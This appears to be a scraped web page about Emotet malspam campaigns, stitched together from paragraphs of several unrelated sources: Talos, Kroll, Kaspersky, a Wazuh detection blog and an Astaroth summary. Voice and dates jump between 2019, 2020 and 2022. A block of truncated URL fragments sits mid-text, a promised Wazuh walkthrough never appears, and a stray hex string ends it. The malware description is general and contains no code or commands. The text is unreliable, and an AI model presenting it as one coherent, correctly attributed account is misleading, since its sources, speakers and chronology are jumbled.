New Spam Template for Emotet Malware: The Latest Trick in the Malspam Campaigns

At the beginning of June 2019, Emotet's operators decided to take an extended summer vacation. Even the command and control (C2) activities saw a major pause in activity. However, as summer begins drawing to a close, Talos and other researchers started to see increased activity in Emotet's C2 infrastructure. And as of Sept. 16, 2019, the Emotet botnet has fully reawakened, and has resumed spamming operations once again. While this reemergence may have many users scared, Talos' traditional Emotet coverage and protection remains the same. We have a slew of new IOCs to help protect users from this latest push, but past Snort coverage will still block this malware, as well traditional best security practices such as avoiding opening suspicious email attachments and using strong passwords.

New Spam Template for Emotet Malware

In the process of analyzing Emotet, Cisco Talos has detonated hundreds of thousands of copies of the Emotet malware inside of our malware sandbox, Threat Grid. Over the past 10 months, Emotet has attempted to use Threat Grid infections as outbound spam emitters nearly 19,000 times.

Emotet operates as a botnet, with each infected device able to coordinate new malspam campaigns to continue the spread of the malware to more victims in different organizations. Kroll observed that as of April 22, 2022, the Emotet operators deployed a change to one of their most active botnet subgroups (tracked as Epoch4), affecting the delivery mechanism of the loader part of the malware.

-cert.gov/ncas/alerts/TA18-201A -is-back-after-summer-break.html -is-back-botnet-springs-back-to-life-with-new-spam-campaign/ -trojan-evolves-since-being-reawakend-here-is-what-we-know/ -summer-vacation-stolen-email-tactic/148460/ -deeper-look-inside-one-of-the-new-emotet-malware-docs/ -soup.net/a-quick-look-at-emotets-updated-javascript-dropper/ -soup.net/extractnetworkindicators-part1/

Over the past several years, Emotet has established itself as a pervasive and continually evolving threat, morphing from a prominent banking trojan to a modular spam and malware-as-a-service botnet with global distribution. After emerging in June 2014 targeting German and Austrian customers, Emotet demonstrated new capabilities in 2015 as it expanded its scope to banking customers in Switzerland [1]. Since that time it has acquired new capabilities, adding modules such as credential stealing, networking spreading, email harvesting and address book stealing, among others [2] [3] [4].

After successful infiltration, this malware modifies system settings and uses the infiltrated computer to proliferate itself further. Cyber criminals usually spread this virus using spam email campaigns.

Emotet is also capable of connecting the infected computer to a botnet, which is used to proliferate spam emails that distribute this malware. In addition, this malware hides within system folders and registers as a 'system service', thereby modifying Windows Registry settings so that it auto-runs when the system is started.

Spam emails typically come with a malicious attachment (link/file) which, once opened, injects Emotet into the system. In some cases, the attachments inject other malware (e.g., TrickBot) which eventually download and install Emotet. It is known that spam campaigns (at least at this current moment) used to spread Emotet are typically related to finances.

Nonetheless, the tactic itself remains the same - crooks send hundreds of thousands of spam emails containing malicious attachments (Microsoft Office documents) which are designed to inject malware into the system.

Update July 29, 2020 - New tactics have been observed in the proliferation of the Emotet malware via email spam campaigns. This malicious software has been updated with an email attachment stealing module. Therefore, from infected systems Emotet can obtain genuine email attachments, which are then used to increase the legitimacy of scam mail spreading this malware.

Now Kaspersky Labs says a rapidly accelerating and complex spam email campaign is enticing marks with fraudulent messages designed to trick one into unpacking and installing Emotet or Qbot malware that can steal information, collect data on a compromised corporate network, and move laterally through the network and install ransomware or other trojans on networked devices.

Emotet is a prolific malware botnet that originally functioned as a banking trojan when it emerged in 2014. It was spread via spam campaigns, imitating financial statements, transfers, and payment invoices. Emotet is propagated mostly via Office email attachments containing a macro. If enabled, it downloads a malicious PE file (Emotet) which is then executed.

In this blog we will explain how to use Wazuh to detect the different stages of emotet malware. Emotet is a malware originally designed as a trojan, and mainly used to steal sensitive and private information. It has the ability to spread to other connected computers and even act as a gateway for other malware.

Astaroth is a fileless malware campaign that spammed users with links to a .LNK shortcut file. When users downloaded the file, a WMIC tool was launched, along with a number of other legitimate Windows tools. These tools downloaded additional code that was executed only in memory, leaving no evidence that could be detected by vulnerability scanners. Then the attacker downloaded and ran a Trojan that stole credentials and uploaded them to a remote server.

Its first version dates back to 2014. Back then it was primarily a banking trojan. These days Emotet is known mostly for its spamming capabilities and as a delivery mechanism of other malware strains. 2ff7e9595c